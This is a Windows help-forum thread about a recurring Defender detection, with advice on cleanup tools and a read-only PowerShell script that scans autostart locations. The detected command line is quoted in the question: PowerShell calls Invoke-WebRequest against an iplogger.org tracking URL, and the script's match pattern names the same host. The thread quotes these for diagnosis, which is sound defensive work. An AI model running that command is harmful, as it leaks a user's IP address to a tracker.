Microsoft Defender Detects powershell trojan

Every time I boot up my machine, Windows Defender detects this: CmdLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -command Invoke-WebRequest -URI https://iplogger.org/1hTS97. I remove it, but it just keeps coming back. Is there a fix for this?

Scan your PC with the free version of Malwarebytes.

https://www.malwarebytes.com/

If Malwarebytes doesn't clean things up then download Autoruns.

Right click on autoruns.exe and Run as Administrator.

When it has finished scanning, go to File -> Save and save the log.arn file, then zip the log and share it via OneDrive or any cloud file sharing service. Post the link to the log file and I'll analyze it for you.

https://live.sysinternals.com/Autoruns.exe
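As an added example (not code from anyone in this thread), the following read-only PowerShell check walks the same autostart locations Autoruns covers (Run/RunOnce keys, scheduled tasks, startup folders, WMI event consumers) and prints any entry whose command line matches the alert quoted in the question; the match pattern is assumed from that alert and should be adjusted if your detection differs.

```powershell
# Added example (not from the thread): list Windows autostart locations and
# flag entries whose command line matches the one Defender reported
# (powershell.exe running Invoke-WebRequest against iplogger.org).
# Run from an elevated PowerShell prompt. Read-only: it reports, nothing more.
$Pattern = 'powershell.*Invoke-WebRequest|iplogger\.org'   # from the alert in the question
$hits = New-Object System.Collections.Generic.List[object]

function Add-Hit([string]$Source, [string]$Name, [string]$Command) {
    if ($Command -and $Command -match $Pattern) {
        $hits.Add([pscustomobject]@{ Source = $Source; Name = $Name; Command = $Command })
    }
}

# 1. Run/RunOnce keys: per-machine, per-user and the 32-bit (WOW6432Node) view,
#    since the reported binary lives under SysWOW64.
$runKeys = 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
           'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
           'HKLM:\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run',
           'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
           'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
foreach ($key in $runKeys | Where-Object { Test-Path $_ }) {
    foreach ($p in (Get-ItemProperty -Path $key).PSObject.Properties) {
        if ($p.Name -notmatch '^PS') { Add-Hit $key $p.Name ([string]$p.Value) }
    }
}

# 2. Scheduled tasks: the usual way a command comes back at every boot or logon.
foreach ($task in Get-ScheduledTask) {
    foreach ($a in $task.Actions) {
        Add-Hit 'ScheduledTask' "$($task.TaskPath)$($task.TaskName)" "$($a.Execute) $($a.Arguments)"
    }
}

# 3. Startup folders: resolve .lnk shortcuts to their real target and arguments.
$shell = New-Object -ComObject WScript.Shell
$startupDirs = "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup",
               "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
foreach ($f in Get-ChildItem $startupDirs -File -ErrorAction SilentlyContinue) {
    $cmd = if ($f.Extension -eq '.lnk') {
        $lnk = $shell.CreateShortcut($f.FullName); "$($lnk.TargetPath) $($lnk.Arguments)"
    } else { Get-Content $f.FullName -Raw -ErrorAction SilentlyContinue }
    Add-Hit 'StartupFolder' $f.FullName $cmd
}

# 4. WMI permanent event subscriptions (CommandLineEventConsumer).
Get-CimInstance -Namespace root\subscription -ClassName CommandLineEventConsumer -ErrorAction SilentlyContinue |
    ForEach-Object { Add-Hit 'WMIConsumer' $_.Name $_.CommandLineTemplate }

if ($hits.Count) { $hits | Format-Table -AutoSize -Wrap } else { 'No matching autostart entries found.' }
```

Any hit it prints is a candidate for the persistence that relaunches the command at boot; it does not cover every location Autoruns checks (services, drivers, Winlogon, Office add-ins), so the Autoruns log is still the fuller picture.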


Hi CarterBurke1 -

I'm Kevin B., Independent Advisor and a Windows user like you. I do apologize for the inconvenience that you are experiencing right now; let me help you sort things out.

Were there any recent changes made to the computer before the issue started?

Kindly follow the steps below and check if it will resolve the issue.

Boot your computer in Safe Mode. Safe Mode is a Windows environment used to troubleshoot, diagnose and repair corrupted Windows system files. While the computer is in Safe Mode, no 3rd-party application will run, not even your anti-virus, and only the services needed by Windows to boot are running on the computer. This ensures that the computer will only use applications and services at a minimal level, avoiding conflicting 3rd-party applications and services.

Please click on the link below and follow the steps to boot your computer in Safe Mode.

https://support.microsoft.com/en-us/windows/sta...

Once in Safe Mode, you can run a scan using your anti-malware scanner, or you can use the Microsoft Safety Scanner, just to make sure that the computer doesn't have any threats.

Click on the link below to access the Microsoft Safety Scanner.

https://docs.microsoft.com/en-us/windows/securi...

Once the scan is done, please run System File Checker on your computer to check the integrity of the Windows system files on your computer.

Click the link below and follow the steps on how to run System File Checker on your computer.

https://support.microsoft.com/en-us/topic/use-t...

After the scan, please perform a clean boot on the computer.

Perform Clean Boot
- This process will stop 3rd-party applications running in the background of your computer, along with services that are not needed to run Windows. If there's any conflicting 3rd-party application that causes the issue on your computer, this process will stop it.

1. Open the Run box by pressing the Windows key + R and type msconfig.
2. The System Configuration Utility box will open; by default you are on the General tab.
3. On the General tab, click Selective startup and make sure that Load system services and Load startup items both have a check mark.
4. Click on the Services tab.
5. Put a check mark on Hide all Microsoft services. This is a very important part: if you miss clicking this, the computer might not boot properly or permanently, and will end up needing a clean installation.
6. Once Hide all Microsoft services has a check mark on it, click on Disable all.
7. Click on the Startup tab and click Open Task Manager. This will open another window which contains all your startup applications on the administrator account.
8. Disable all applications that you're not using. You can simply click on them and select Disable.
9. Click OK, Apply and close the configuration utility.

After the clean boot, please try to delete the temporary files on your computer to make sure that the threats are not using the temporary files on your computer.

https://support.microsoft.com/en-us/windows/dis...

Restart your computer normally.

Hope this will help, and have a blessed day!

Thanks.
Kevin B.
Independent advisor


Hi Carter,

If you display Protection History in Defender, do you see the "notification" of a Trojan?

If you do, and neither MalwareBytes nor the Microsoft Safety Scanner detect the Trojan, but Defender continues to detect it, it is probably a false positive.

Defender has the propensity to "detect" items that it has already remediated, but left a copy of its "notification" in Detection History. That is why the other scanners do not detect it. If this is your case, you can eliminate the alerts that Defender is presenting by deleting the Detection History folder.

This procedure is perfectly safe. Windows rebuilds the Detection History folder the next time that it needs it.

This link provides the instructions for deleting the folder. Disregard the reference to PUPs. This situation applies to other malware as well.

https://answers.microsoft.com/en-us/protect/forum/all/windows-defender-identifies-the-same-pup-as-a/63f17794-3815-4784-b9cd-c6059c8e0828

Good luck, Glen


Did that, and it still detects it.


Provide an Autoruns log as detailed in my previous reply.


https://drive.google.com/file/d/1LLXgIkW8ad57tPJj9FrAx4Mvz5yjfxOu/view?usp=sharing Here you go.


Thanks for the log; unfortunately, it's not showing anything suspicious.

If it's still detected after removing it from Protection History, and a full scan is not finding anything, it may be worth posting in a dedicated malware removal forum.

https://forums.malwarebytes.com/forum/7-windows-malware-removal-help-support/

https://www.bleepingcomputer.com/forums/f/22/virus-trojan-spyware-and-malware-removal-help/

Question Info

Last updated March 11, 2024. Views: 2,819.